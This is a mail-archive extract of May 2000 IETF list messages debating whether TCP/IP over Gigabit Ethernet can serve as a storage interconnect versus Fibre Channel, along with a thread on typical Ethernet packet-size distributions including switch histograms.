Thanks for the feedback, Mssrs. Fisk and Nagle,
I think a problem for IT folks who are hearing early statements about SANs
based on GE has to do with an issue to which you both alluded.
Specifically, what parameters -- bandwidth, throughput, latency, etc. --
must designers consider when evaluating or building a storage networking
interconnect?
Put another way, when I design an aircraft, I know about lift, drag and
other engineering parameters and can plug them into calculations that will
enable me to design a wing to lift X number of pounds. When it comes to
storage networks, I cannot get a straight answer from any vendor regarding
the parameters that must be observed or satisfied -- whether stated as
straightforward quantities/formula or general rules of thumb -- in order to
develop a working storage networking interconnect!
What factors determine the amount of bandwidth required?
What amount of latency can be tolerated?
How quickly must erred information be re-sent?
Does this all depend upon the characteristics of the storage traffic itself?
Are the parameters application dependent?
Surely, traditional SCSI bus design delivered a solution that must be
equaled or improved upon by SAN interconnects such as FC, GE or Infiniband
for the latter to be regarded as viable storage interconnects. This can't
be rocket science: Is there a convenient set of storage architecture design
parameters here that I am simply overlooking?
I have no axe to grind with the FC folks, but there seems to be a holy war
shaping up around FC versus GE as a storage interconnect. I am tracking
strategies for TCP offload or ASICS speed-up and agree that the optimization
of TCP/IP functionality to support the use of GE and 10 speed GE as a SAN as
well as a LAN interconnect. I find such a solution to be quite practical,
but I do not say that FC is inferior. There are many roads that lead to
Rome, as the saying goes. What is of concern to me (and to my readers) is
to avoid deploying a technology (FC, for example) that may need to be
"forklift upgraded" within a year.
Please let me know if you are aware of any storage networking design
criteria that must be addressed by any interconnect regardless of its
underlying protocol.
Thanks,
Jon Toigo
Independent Consultant and Author
The Holy Grail of Data Storage Management
[EMAIL PROTECTED]
----- Original Message -----
From: Dave Nagle <[EMAIL PROTECTED]>
To: Jon William Toigo <[EMAIL PROTECTED]>
Cc: <[EMAIL PROTECTED]>
Sent: Thursday, May 25, 2000 7:27 PM
Subject: Re: Storage over Ethernet/IP
> Jon,
>
> Original Message
> ----------------
> >> I am seeking a few points of clarification:
> >>
> >> 1. Fibre Channel folks have attempted to explain to me why TCP/IP
could =
> >> NEVER be a viable interconnect for block level storage operations.
They =
> >> claim:
> >> a. TCP is too CPU intensive and creates too much latency for storage
=
> >> I/O operations.
> >> b. The IP stack is too top heavy and processing packet headers is too
=
> >> slow to support storage I/O operations.
>
> There is a lot of work to show that this is not true. Check out Van
> Meter's 1998 ASPLOS paper "VISA - Netstations virtual internet SCSI
> adaptor."
>
> Perhaps more importantly, there are many companies that are building
> TCP in silicon ASICs. This should make TCP's performance comparable
> to Fibre Channel. Both TCP/IP and FC provide about the same
> functionality ... reliable, in-order transmission.
>
> The bottom line is that FC is done in hardware while TCP has
> traditionally been done in software. Therefore, previous performance
> numbers are not going to be fair. Once TCP is in silicon, its
> performance should be roughly equal to FC.
>
> >> c. The maximum throughput of a GE TCP/IP connection is 768 Mps, which
=
> >> is too slow to support storage I/O operations.
>
> I believe there are higher numbers (especially with Jumbo
> Frames). Alteon's web site show's 920 Mbps. Microsoft and Duke
> University have both shown TCP performance o 1Gb+/s performance over
> other networks.
>
> BTW, why is 768 Mbps too slow for storage. Many apps (e.g.,
> transaction workloads) are I/O's per second bound, not bandwidth
> bound. Also, even if storage over IP/ether is a bit slower than FC,
> the benefits of leveraging IP's infrastructure (i.e., routers,
> switches, NICs, network management, networking people) is a huge
> advantage.
>
> There is also the issue of SCSI over TCP/IP in the SAN vs. the
> LAN/WAN. Some companies, focusing on the SAN, are building
> SCSI/lightweight transport/IP while others, focusing on the WAN,
> propose SCSI/TCP/IP. It may be the case that SAN and WAN traffic use
> different transport protocols to gain a bit of extra performance in
> the SAN.
>
> >> Is any of this true?
> >>
> >> 2. Adaptec has posited a replacement for TCP called STP for use as a
=
> >> transport for storage. Does anyone know anything about this?
>
> From Paul von Stamwitz's posting to the ips mailing list ...
>
> The link to the SEP draft is
> http://www.ietf.org/internet-drafts/draft-wilson-sep-00.txt
>
> The press release is at:
> http://www.adaptec.com/adaptec/press/release000504.html
>
> The demo shows a Gb ethernet controller transporting SCSI traffic to
several
> targets through an off-the-shelf 100TX switch with a Gb uplink. The
targets
> are ethernet to U160 SCSI bridges with one or more SCSI drives
attached. The
> host controller runs under NT4.0 at appears to the OS as a SCSI host
bus
> adapter.
>
> The architecture is based on Adaptec's SCSI Encapsulation Protocol
> (SEP). SEP is mapped on top of TCP/IP or a light-weight transport
> protocol specifically designed for SANs.
>
> An SEP overview was presented at the IPS BOF in Adelaide last month
and an
> internet draft on SEP was submitted to IETF this week. I will forward
the
> link as soon as it becomes available. This draft is informational
> only and intended to aid in this group's work toward an industry
> standard SCSI transport protocol over IP networks.
>
>
> >> 3. Current discussions of the SCSI over IP protocol seem to ignore
the =
> >> issue of TCP or any other transport protocol. Does anyone know =
> >> definitively what transport is being suggested by the IBM/Cisco crowd?
>
> Current SCSI over IP discussions are not ignoring TCP ... they are
> definitely considering TCP as the primary transport. See the ips
> web site at:
>
> http://www.ece.cmu.edu/~ips
>
> >>
> >> 4. Another storage company is looking at Reliable UDP as a substitute
=
> >> for TCP in storage data transfers. Where can I learn more about this
=
> >> protocol, which I am told was introduced many years ago by Cisco?
>
> Companies to look at include:
>
> nishansystems.com
> interprophet.com
> san.com
> arkresearch.com
>
> Also, I believe that the IETF IP over FC working group is now
> looking at FC over IP.
>
>
>
> dave...........
>
> David Nagle
> Director, Parallel Data Lab
> Senior Reseach Computer Scientist
> School of Computer Science
> Carnegie Mellon University
> Pittsburgh, PA 15213
> 412-268-3898 (office)
> 412-268-3890 (fax)
> http://www.ece.cmu.edu/~bassoon
>
>From owner-ietf-outbound Thu May 25 21:00:20 2000
Received: by ietf.org (8.9.1a/8.9.1a) id VAA23676
for [EMAIL PROTECTED]; Thu, 25 May 2000 21:00:02 -0400 (EDT)
Received: from MailGate.Adtech-Inc.COM (smtp.adtech-inc.com [192.216.50.164])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id UAA23631
for <[EMAIL PROTECTED]>; Thu, 25 May 2000 20:50:08 -0400 (EDT)
Received: from mgmgrand.adtech-inc.com (Trans_Exchange.Adtech-Inc.COM [192.216.50.163])
by MailGate.Adtech-Inc.COM (8.10.0/8.10.0) with ESMTP id e4Q0q6220818;
Thu, 25 May 2000 14:52:06 -1000 (HST)
Received: by mgmgrand.adtech-inc.com with Internet Mail Service (5.5.2650.21)
id <L2H0AQRZ>; Thu, 25 May 2000 14:50:07 -1000
Message-ID: <[EMAIL PROTECTED]>
From: "Robin.Uyeshiro" <[EMAIL PROTECTED]>
To: Timothy Behne <[EMAIL PROTECTED]>
Cc: [EMAIL PROTECTED]
Subject: RE: Average Ethernet packet length
Date: Thu, 25 May 2000 14:50:06 -1000
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
Content-Type: multipart/alternative;
boundary="----_=_NextPart_001_01BFC6AC.560EF0AC"
X-Loop: [EMAIL PROTECTED]
This message is in MIME format. Since your mail reader does not understand
this format, some or all of this message may not be legible.
------_=_NextPart_001_01BFC6AC.560EF0AC
Content-Type: text/plain
I saw an article a while back that showed spikes at 64 bytes (TCP handshake,
increased with web growth), 590 bytes (576 byte min mtu), and 1518 bytes
(Ethernet max). This was a few years old. I don't know if it listed an
average. I'll try to dig it up.
-----Original Message-----
From: Timothy Behne [SMTP:[EMAIL PROTECTED]]
Sent: Thursday, May 25, 2000 11:15 AM
To: '[EMAIL PROTECTED]'
Subject: Average Ethernet packet length
> Hi,
>
> A recent thread suggested something interesting - an average
Ethernet/IP
> packet length of 500 bytes. Has there been any work done in the
area of
> finding average packet lengths, bandwidth usage, etc. of typical
(read:
> unknown) networks? Are there any "rules of thumb" values that are
> typically used?
>
> Thanks,
>
> Tim Behne
> Signal Processing Engineer
> Tadiran Microwave Networks
> 1000 Greenbriar, Ste 100A
> Stafford, Texas 77477
> [EMAIL PROTECTED]
>
------_=_NextPart_001_01BFC6AC.560EF0AC
Content-Type: text/html
Content-Transfer-Encoding: quoted-printable
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
<HTML>
<HEAD>
<META HTTP-EQUIV=3D"Content-Type" CONTENT=3D"text/html; =
charset=3DUS-ASCII">
<META NAME=3D"Generator" CONTENT=3D"MS Exchange Server version =
5.5.2650.12">
<TITLE>RE: Average Ethernet packet length</TITLE>
</HEAD>
<BODY>
<P><FONT SIZE=3D2 FACE=3D"Arial">I saw an article a while back that =
showed spikes at 64 bytes (TCP handshake, increased with web growth), =
590 bytes (576 byte min mtu), and 1518 bytes (Ethernet max). This =
was a few years old. I don't know if it listed an average. =
I'll try to dig it up.</FONT></P>
<UL>
<P><A NAME=3D"_MailData"><FONT SIZE=3D2 FACE=3D"Arial">-----Original =
Message-----</FONT></A>
<BR><B><FONT SIZE=3D2 FACE=3D"Arial">From: Timothy Behne =
[SMTP:[EMAIL PROTECTED]]</FONT></B>
<BR><B><FONT SIZE=3D2 FACE=3D"Arial">Sent: </FONT></B> <FONT =
SIZE=3D2 FACE=3D"Arial">Thursday, May 25, 2000 11:15 AM</FONT>
<BR><B><FONT SIZE=3D2 =
FACE=3D"Arial">To: </FONT></B> <FONT SIZE=3D2 =
FACE=3D"Arial">'[EMAIL PROTECTED]'</FONT>
<BR><B><FONT SIZE=3D2 =
FACE=3D"Arial">Subject: </FONT>=
</B> <FONT SIZE=3D2 FACE=3D"Arial">Average Ethernet packet =
length</FONT>
</P>
<BR>
<P><FONT SIZE=3D2 FACE=3D"Arial">> Hi,</FONT>
<BR><FONT SIZE=3D2 FACE=3D"Arial">> </FONT>
<BR><FONT SIZE=3D2 FACE=3D"Arial">> A recent thread suggested =
something interesting - an average Ethernet/IP</FONT>
<BR><FONT SIZE=3D2 FACE=3D"Arial">> packet length of 500 =
bytes. Has there been any work done in the area of</FONT>
<BR><FONT SIZE=3D2 FACE=3D"Arial">> finding average packet lengths, =
bandwidth usage, etc. of typical (read:</FONT>
<BR><FONT SIZE=3D2 FACE=3D"Arial">> unknown) networks? Are =
there any "rules of thumb" values that are</FONT>
<BR><FONT SIZE=3D2 FACE=3D"Arial">> typically used?</FONT>
<BR><FONT SIZE=3D2 FACE=3D"Arial">> </FONT>
<BR><FONT SIZE=3D2 FACE=3D"Arial">> Thanks,</FONT>
<BR><FONT SIZE=3D2 FACE=3D"Arial">> </FONT>
<BR><FONT SIZE=3D2 FACE=3D"Arial">> Tim Behne</FONT>
<BR><FONT SIZE=3D2 FACE=3D"Arial">> Signal Processing =
Engineer</FONT>
<BR><FONT SIZE=3D2 FACE=3D"Arial">> Tadiran Microwave =
Networks</FONT>
<BR><FONT SIZE=3D2 FACE=3D"Arial">> 1000 Greenbriar, Ste 100A</FONT>
<BR><FONT SIZE=3D2 FACE=3D"Arial">> Stafford, Texas 77477</FONT>
<BR><FONT SIZE=3D2 FACE=3D"Arial">> =
[EMAIL PROTECTED]</FONT>
<BR><FONT SIZE=3D2 FACE=3D"Arial">> </FONT>
</P>
</UL>
</BODY>
</HTML>
------_=_NextPart_001_01BFC6AC.560EF0AC--
>From owner-ietf-outbound Thu May 25 21:20:19 2000
Received: by ietf.org (8.9.1a/8.9.1a) id VAA23958
for [EMAIL PROTECTED]; Thu, 25 May 2000 21:20:02 -0400 (EDT)
Received: from mail-blue.research.att.com (mail-blue.research.att.com [135.207.30.102])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id VAA23858
for <[EMAIL PROTECTED]>; Thu, 25 May 2000 21:10:20 -0400 (EDT)
Received: from postal.research.att.com (postal.research.att.com [135.207.23.30])
by mail-blue.research.att.com (Postfix) with ESMTP
id D44A44CE1A; Thu, 25 May 2000 21:10:07 -0400 (EDT)
Received: from smb.research.att.com (postal.research.att.com [135.207.23.30])
by postal.research.att.com (8.8.7/8.8.7) with ESMTP id VAA27621;
Thu, 25 May 2000 21:09:32 -0400 (EDT)
Received: from smb.research.att.com (localhost.research.att.com [127.0.0.1])
by smb.research.att.com (Postfix) with ESMTP
id 8961C35DC2; Thu, 25 May 2000 21:08:49 -0400 (EDT)
X-Mailer: exmh version 2.1.1 10/15/1999
From: "Steven M. Bellovin" <[EMAIL PROTECTED]>
To: Timothy Behne <[EMAIL PROTECTED]>
Cc: "'[EMAIL PROTECTED]'" <[EMAIL PROTECTED]>
Subject: Re: Average Ethernet packet length
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Date: Thu, 25 May 2000 21:08:19 -0400
Sender: [EMAIL PROTECTED]
Message-Id: <[EMAIL PROTECTED]>
X-Loop: [EMAIL PROTECTED]
In message <CC96542306D7D2119E0B080009EB58FE9582FA@MERCURY>, Timothy Behne writ
es:
>
>> Hi,
>>
>> A recent thread suggested something interesting - an average Ethernet/IP
>> packet length of 500 bytes. Has there been any work done in the area of
>> finding average packet lengths, bandwidth usage, etc. of typical (read:
>> unknown) networks? Are there any "rules of thumb" values that are
>> typically used?
There are no good, current studies on LAN behavior that I've seen.
There have been a number of papers on WAN behavior. The usual result
of those is that ~40-50% of packets are about 40-44 bytes, but most of
the bytes are carried by packets of ~500-576 or 1500 bytes.
--Steve Bellovin
>From owner-ietf-outbound Thu May 25 21:40:14 2000
Received: by ietf.org (8.9.1a/8.9.1a) id VAA24254
for [EMAIL PROTECTED]; Thu, 25 May 2000 21:40:03 -0400 (EDT)
Received: from lint.cisco.com (lint.cisco.com [171.68.224.209])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id VAA24211
for <[EMAIL PROTECTED]>; Thu, 25 May 2000 21:37:59 -0400 (EDT)
Received: from bigger-dawgs.cisco.com (pferguso-isdn.cisco.com [171.70.114.134]) by
lint.cisco.com (8.8.6 (PHNE_14041)/CISCO.SERVER.1.2) with ESMTP id SAA27377; Thu, 25
May 2000 18:36:45 -0700 (PDT)
Message-Id: <[EMAIL PROTECTED]>
X-Sender: [EMAIL PROTECTED]
X-Mailer: QUALCOMM Windows Eudora Version 4.3.1
Date: Thu, 25 May 2000 21:36:42 -0400
To: "Steven M. Bellovin" <[EMAIL PROTECTED]>
From: Paul Ferguson <[EMAIL PROTECTED]>
Subject: Re: Average Ethernet packet length
Cc: Timothy Behne <[EMAIL PROTECTED]>,
"'[EMAIL PROTECTED]'" <[EMAIL PROTECTED]>
In-Reply-To: <[EMAIL PROTECTED]>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
X-Loop: [EMAIL PROTECTED]
Also some good stats at www.caida.org
- paul
At 09:08 PM 05/25/2000 -0400, Steven M. Bellovin wrote:
> >> A recent thread suggested something interesting - an average Ethernet/IP
> >> packet length of 500 bytes. Has there been any work done in the area of
> >> finding average packet lengths, bandwidth usage, etc. of typical (read:
> >> unknown) networks? Are there any "rules of thumb" values that are
> >> typically used?
>
>There are no good, current studies on LAN behavior that I've seen.
>There have been a number of papers on WAN behavior. The usual result
>of those is that ~40-50% of packets are about 40-44 bytes, but most of
>the bytes are carried by packets of ~500-576 or 1500 bytes.
>From owner-ietf-outbound Thu May 25 22:10:08 2000
Received: by ietf.org (8.9.1a/8.9.1a) id WAA25552
for [EMAIL PROTECTED]; Thu, 25 May 2000 22:10:02 -0400 (EDT)
Received: from mail-out1.apple.com (mail-out1.apple.com [17.254.0.52])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id WAA25527
for <[EMAIL PROTECTED]>; Thu, 25 May 2000 22:09:41 -0400 (EDT)
Received: from mailgate2.apple.com (A17-129-100-225.apple.com [17.129.100.225])
by mail-out1.apple.com (8.9.3/8.9.3) with ESMTP id TAA20893
for <[EMAIL PROTECTED]>; Thu, 25 May 2000 19:09:41 -0700 (PDT)
Received: from scv3.apple.com (scv3.apple.com) by mailgate2.apple.com
(Content Technologies SMTPRS 2.0.15) with ESMTP id <[EMAIL PROTECTED]>
for <[EMAIL PROTECTED]>;
Thu, 25 May 2000 19:09:40 -0700
Received: from [17.201.23.37] (chesh1.apple.com [17.201.23.37])
by scv3.apple.com (8.9.3/8.9.3) with SMTP id TAA24729
for <[EMAIL PROTECTED]>; Thu, 25 May 2000 19:09:40 -0700 (PDT)
Message-Id: <[EMAIL PROTECTED]>
Subject: Re: Average Ethernet packet length
Date: Thu, 25 May 2000 19:09:50 -0700
x-sender: [EMAIL PROTECTED]
x-mailer: Claris Emailer 2.0v3, January 22, 1998
From: Stuart Cheshire <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
MIME-Version: 1.0
Content-Type: text/plain; charset="US-ASCII"
X-Loop: [EMAIL PROTECTED]
>There are no good, current studies on LAN behavior that I've seen.
>There have been a number of papers on WAN behavior. The usual result
>of those is that ~40-50% of packets are about 40-44 bytes, but most of
>the bytes are carried by packets of ~500-576 or 1500 bytes.
>
> --Steve Bellovin
In some traces I did for my PhD work about three years ago, I found that
51% of the packets were 40 or 41 bytes long (i.e. mostly TCP acks or
one-byte TCP payloads). Only 15% of the packets were maximum-sized. The
average packet size was 273 bytes. This workload was probably heavier on
telnet than today's networks; however even when doing bulk file transfer,
one packet in three is still an ack.
Stuart Cheshire <[EMAIL PROTECTED]>
* Wizard Without Portfolio, Apple Computer
>From owner-ietf-outbound Thu May 25 23:20:25 2000
Received: by ietf.org (8.9.1a/8.9.1a) id XAA27020
for [EMAIL PROTECTED]; Thu, 25 May 2000 23:20:01 -0400 (EDT)
Received: from inner.net (avarice.inner.net [199.33.248.2])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id XAA26965
for <[EMAIL PROTECTED]>; Thu, 25 May 2000 23:10:45 -0400 (EDT)
Received: from wasp.inet.org ([216.52.8.30])
by inner.net (8.7.6/8.9.3) with ESMTP id DAA04303;
Fri, 26 May 2000 03:02:24 GMT
Message-Id: <[EMAIL PROTECTED]>
X-Sender: [EMAIL PROTECTED]
X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.0.58
Date: Thu, 25 May 2000 23:10:16 +0100
To: "Jon William Toigo" <[EMAIL PROTECTED]>
From: RJ Atkinson <[EMAIL PROTECTED]>
Subject: Re: Storage over Ethernet/IP
Cc: <[EMAIL PROTECTED]>
In-Reply-To: <06d001bfc693$7f18ff20$dd9cfea9@jtoigo>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
X-Loop: [EMAIL PROTECTED]
At 22:52 25-05-00 , Jon William Toigo wrote:
>c. The maximum throughput of a GE TCP/IP connection is 768 Mps, which is
>too slow to support storage I/O operations.
Provably false. In fact TCP throughput above 768 Mbps over 1518-byte GE
has been demonstrated publicly in the past in several different fora.
At a recent DoE meeting there were several different examples cited,
though I don't have the details at hand this minute.
Ran
[EMAIL PROTECTED]
>From owner-ietf-outbound Thu May 25 23:40:31 2000
Received: by ietf.org (8.9.1a/8.9.1a) id XAA27608
for [EMAIL PROTECTED]; Thu, 25 May 2000 23:40:02 -0400 (EDT)
Received: from black-ice.cc.vt.edu ([EMAIL PROTECTED] [128.173.14.71])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id XAA27578
for <[EMAIL PROTECTED]>; Thu, 25 May 2000 23:38:21 -0400 (EDT)
From: [EMAIL PROTECTED]
Received: from black-ice.cc.vt.edu (valdis@LOCALHOST [127.0.0.1])
by black-ice.cc.vt.edu (8.11.0.Beta1/8.11.0.Beta1) with ESMTP id e4Q3cK926414;
Thu, 25 May 2000 23:38:20 -0400
Message-Id: <[EMAIL PROTECTED]>
To: Jon William Toigo <[EMAIL PROTECTED]>
cc: [EMAIL PROTECTED]
Subject: Re: Storage over Ethernet/IP
In-reply-to: Your message of "Thu, 25 May 2000 20:08:50 EDT."
<071301bfc6a6$932353e0$dd9cfea9@jtoigo>
X-URL: http://black-ice.cc.vt.edu/~valdis/
X-Face: 34C9$Ewd2zeX+\!i1BA\j{ex+$/V'JBG#;3_noWWYPa"|,I#`R"{n@w>#:{)FXyiAS7(8t(
^*w5O*!8O9YTe[r{e%7(yVRb|qxsRYw`7J!`AM}m_SHaj}f8eb@d^L>BrX7iO[<!v4-0bVIpaxF#-)
%9#a9h6JXI|T|8o6t\V?kGl]Q!1V]GtNliUtz:3},0"hkPeBuu%E,j(:\iOX-P,t7lRR#
References: <[EMAIL PROTECTED]>
<071301bfc6a6$932353e0$dd9cfea9@jtoigo>
Date: Thu, 25 May 2000 23:38:20 -0400
X-Loop: [EMAIL PROTECTED]
On Thu, 25 May 2000 20:08:50 EDT, Jon William Toigo <[EMAIL PROTECTED]> said:
> Put another way, when I design an aircraft, I know about lift, drag and
> other engineering parameters and can plug them into calculations that will
> enable me to design a wing to lift X number of pounds. When it comes to
> storage networks, I cannot get a straight answer from any vendor regarding
> the parameters that must be observed or satisfied -- whether stated as
> straightforward quantities/formula or general rules of thumb -- in order to
> develop a working storage networking interconnect!
We have over 100 years of experience in the design of fixed-wing
aircraft - the Wright brothers were following onto several years
of glider design.
We have about 10 years experience in the design of high-speed
networks - I think a decade ago, the NSFNet had just completed
a move from 56KB links to T1, and were just starting to think
about T3 links (I may be off a year or two here).
The Red Baron's plane had 20 years of design experience behind it.
How many seconds would you give him against an F-14?
The vendors don't have rules of thumb yet. Rules of thumb are a clear
indication that a field is mature. And in this industry, "mature" is
equivalent to "no longer a buzzword".
Valdis Kletnieks
Operating Systems Analyst
Virginia Tech
>From owner-ietf-outbound Fri May 26 00:30:22 2000
Received: by ietf.org (8.9.1a/8.9.1a) id AAA28184
for [EMAIL PROTECTED]; Fri, 26 May 2000 00:30:03 -0400 (EDT)
Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id AAA27940
for <[EMAIL PROTECTED]>; Fri, 26 May 2000 00:23:47 -0400 (EDT)
Received: (from wollman@localhost)
by khavrinen.lcs.mit.edu (8.9.3/8.9.3) id AAA04973;
Fri, 26 May 2000 00:23:45 -0400 (EDT)
(envelope-from wollman)
Date: Fri, 26 May 2000 00:23:45 -0400 (EDT)
From: Garrett Wollman <[EMAIL PROTECTED]>
Message-Id: <[EMAIL PROTECTED]>
To: "Steven M. Bellovin" <[EMAIL PROTECTED]>
Cc: Timothy Behne <[EMAIL PROTECTED]>,
"'[EMAIL PROTECTED]'" <[EMAIL PROTECTED]>
Subject: Re: Average Ethernet packet length
In-Reply-To: <[EMAIL PROTECTED]>
References: <[EMAIL PROTECTED]>
X-Loop: [EMAIL PROTECTED]
<<On Thu, 25 May 2000 21:08:19 -0400, "Steven M. Bellovin" <[EMAIL PROTECTED]> said:
> There are no good, current studies on LAN behavior that I've seen.
However, many LAN switches can provide this information to a
management process. With high-speed networks, this may be the only
way to get information on LAN behavior.
For example, incoming packets on one interface of my backbone switch
are distributed like this:
Bucket # packets %pack %bytes
--------- ----------- ----- ------
0-64 4769641806 29% 2.0%
65-127 5256510303 32% 6.7%
128-255 397530898 2.4% 1.0%
255-511 370987710 2.3% 1.9%
512-1023 1178964791 7.2% 12%
1024-1518 4506971031 27% 76%
(The last column assumes that packet sizes are uniformly distributed
within each bucket, which is wrong but close enough for the purposes
of this message. The first two columns are what I get out of my
switch. Unfortunately, this switch does not count outgoing packets in
the same way.)
That was on an outside-facing interface. An inside-facing interface
looks more like this:
0-64 18184 0.0% 0.0% (I'm not sure I believe this!)
65-127 29402735 42% 6.2%
128-255 6402318 9.2% 2.6%
256-511 848447 1.2% 0.7%
512-1023 2154682 3.1% 3.6%
1024-1518 31014396 44% 87%
(This is a gigabit Ethernet interface with 802.1Q encapsulation, so
the first bin includes only those packets with less than 47 bytes of
Ethernet payload. These two distributions together suggest that about
a quarter of all packets are between 46 and 50 bytes!)
> There have been a number of papers on WAN behavior. The usual result
> of those is that ~40-50% of packets are about 40-44 bytes, but most of
> the bytes are carried by packets of ~500-576 or 1500 bytes.
With a little bit of adjustment, this seems to be borne out in my LAN
environment as well. (But we're probably atypical.)
-GAWollman
>From owner-ietf-outbound Fri May 26 02:10:30 2000
Received: by ietf.org (8.9.1a/8.9.1a) id CAA10563
for [EMAIL PROTECTED]; Fri, 26 May 2000 02:10:03 -0400 (EDT)
Received: from monitor.internaut.com (mg-206253202-54.ricochet.net [206.253.202.54])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id CAA05992
for <[EMAIL PROTECTED]>; Fri, 26 May 2000 02:01:28 -0400 (EDT)
Received: from vaiobean (vaiobean.ntdev.microsoft.com [204.57.137.66] (may be forged))
by monitor.internaut.com (8.9.2/8.8.8) with SMTP id WAA33041;
Thu, 25 May 2000 22:44:11 -0700 (PDT)
Reply-To: <[EMAIL PROTECTED]>
From: "Bernard Aboba" <[EMAIL PROTECTED]>
To: "'Jon William Toigo'" <[EMAIL PROTECTED]>, <[EMAIL PROTECTED]>
Subject: RE: Storage over Ethernet/IP
Date: Thu, 25 May 2000 23:07:16 -0700
Message-ID: <000101bfc6d8$a4fbe370$[EMAIL PROTECTED]>
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary="----=_NextPart_000_0002_01BFC69D.F89E9210"
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook CWS, Build 9.0.2416 (9.0.2910.0)
Importance: Normal
In-Reply-To: <06d001bfc693$7f18ff20$dd9cfea9@jtoigo>
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4131.1600
X-Loop: [EMAIL PROTECTED]
This is a multi-part message in MIME format.
------=_NextPart_000_0002_01BFC69D.F89E9210
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
I too have heard these arguments. When I heard them I felt a sense of deja
vu -- anyone remember
when the conventional wisdom was that "voice will never run over IP?" In
fact, most of the
assertions below are fallacies or soon will become fallacies. The only real
argument is
about the exact form the technology will take -- NAS vs. SAN, etc.
> a. TCP is too CPU intensive and creates too much latency for storage I/O
operations.
There are now task specific processors and co-processors that can handle 1
Gbps line
rate today, and will run at 10 Gbps line rate in 18-24 months. So this
argument has
already fallen by the wayside.
>b. The IP stack is too top heavy and processing packet headers is too
slow to support storage I/O operations.
Too slow? If that were true, we wouldn't be able to handle OC-192, would we?
The real question is
how much the chips, switch fabric and specialized memory will cost, and how
competitive this will
be with existing technologies such as Fibre Channel, both for short and long
haul.
>c. The maximum throughput of a GE TCP/IP connection is 768 Mps, which is
too slow to support storage I/O operations.
That figure was achieved with minimal hardware acceleration. Pushing it by
an order of magnitude within 24 months
is not unimaginable. If you were willing to throw more hardware at the
problem, it might be possible to handle
a 1 Gbps bit rate on 8 lambdas at the same time *today*. How does 8 Gbps of
throughput today sound, with 80 Gbps
in 18-24 months?
> Is any of this true?
No.
------=_NextPart_000_0002_01BFC69D.F89E9210
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META HTTP-EQUIV=3D"Content-Type" CONTENT=3D"text/html; =
charset=3Diso-8859-1">
<META content=3D"MSHTML 5.00.3103.1000" name=3DGENERATOR>
<STYLE></STYLE>
</HEAD>
<BODY bgColor=3D#ffffff>
<DIV><FONT color=3D#0000ff face=3DArial size=3D2><SPAN =
class=3D073584905-26052000>I too=20
have heard these arguments. When I heard them I felt a sense of deja vu =
--=20
anyo</SPAN></FONT><FONT color=3D#0000ff face=3DArial size=3D2><SPAN=20
class=3D073584905-26052000>ne remember</SPAN></FONT></DIV>
<DIV><FONT color=3D#0000ff face=3DArial size=3D2><SPAN =
class=3D073584905-26052000>when=20
the conventional wisdom was that "voice will never run over IP?" In =
fact,=20
most of the</SPAN></FONT></DIV>
<DIV><FONT color=3D#0000ff face=3DArial size=3D2><SPAN=20
class=3D073584905-26052000>assertions below are fallacies or soon will =
become=20
fallacies. The only real argument is</SPAN></FONT></DIV>
<DIV><FONT color=3D#0000ff face=3DArial size=3D2><SPAN =
class=3D073584905-26052000>about=20
the exact form the technology will take -- NAS vs. SAN, etc.=20
</SPAN></FONT></DIV>
<DIV><FONT color=3D#0000ff face=3DArial size=3D2><SPAN=20
class=3D073584905-26052000></SPAN></FONT> </DIV>
<DIV><FONT size=3D2><FONT face=3DArial><SPAN =
class=3D073584905-26052000><FONT=20
color=3D#0000ff> > </FONT></SPAN>a. TCP is too CPU =
intensive=20
and creates too much latency for storage I/O operations.<FONT=20
color=3D#0000ff><SPAN=20
class=3D073584905-26052000> </SPAN></FONT></FONT></FONT></DIV>
<DIV><FONT size=3D2><FONT face=3DArial><FONT color=3D#0000ff><SPAN=20
class=3D073584905-26052000></SPAN></FONT></FONT></FONT> </DIV>
<DIV><FONT size=3D2><FONT face=3DArial><FONT color=3D#0000ff><SPAN=20
class=3D073584905-26052000>There are now task specific processors and=20
co-processors that can </SPAN></FONT></FONT></FONT><FONT size=3D2><FONT=20
face=3DArial><FONT color=3D#0000ff><SPAN =
class=3D073584905-26052000>handle 1 Gbps=20
line</SPAN></FONT></FONT></FONT></DIV>
<DIV><FONT size=3D2><FONT face=3DArial><FONT color=3D#0000ff><SPAN=20
class=3D073584905-26052000>rate today, and will run at 10 Gbps line rate =
in 18-24=20
months. So this argument has </SPAN></FONT></FONT></FONT></DIV>
<DIV><FONT size=3D2><FONT face=3DArial><FONT color=3D#0000ff><SPAN=20
class=3D073584905-26052000>already fallen by the=20
wayside.</SPAN></FONT></FONT></FONT></DIV>
<DIV><FONT size=3D2><FONT face=3DArial><FONT color=3D#0000ff><SPAN=20
class=3D073584905-26052000></SPAN></FONT></FONT></FONT> </DIV>
<DIV><FONT size=3D2><FONT face=3DArial><SPAN=20
class=3D073584905-26052000> ></SPAN>b. The IP stack is too =
top heavy=20
and processing packet headers is too slow to support storage I/O=20
operations.<FONT color=3D#0000ff><SPAN=20
class=3D073584905-26052000> </SPAN></FONT></FONT></FONT></DIV>
<DIV><FONT size=3D2><FONT face=3DArial><FONT color=3D#0000ff><SPAN=20
class=3D073584905-26052000></SPAN></FONT></FONT></FONT> </DIV>
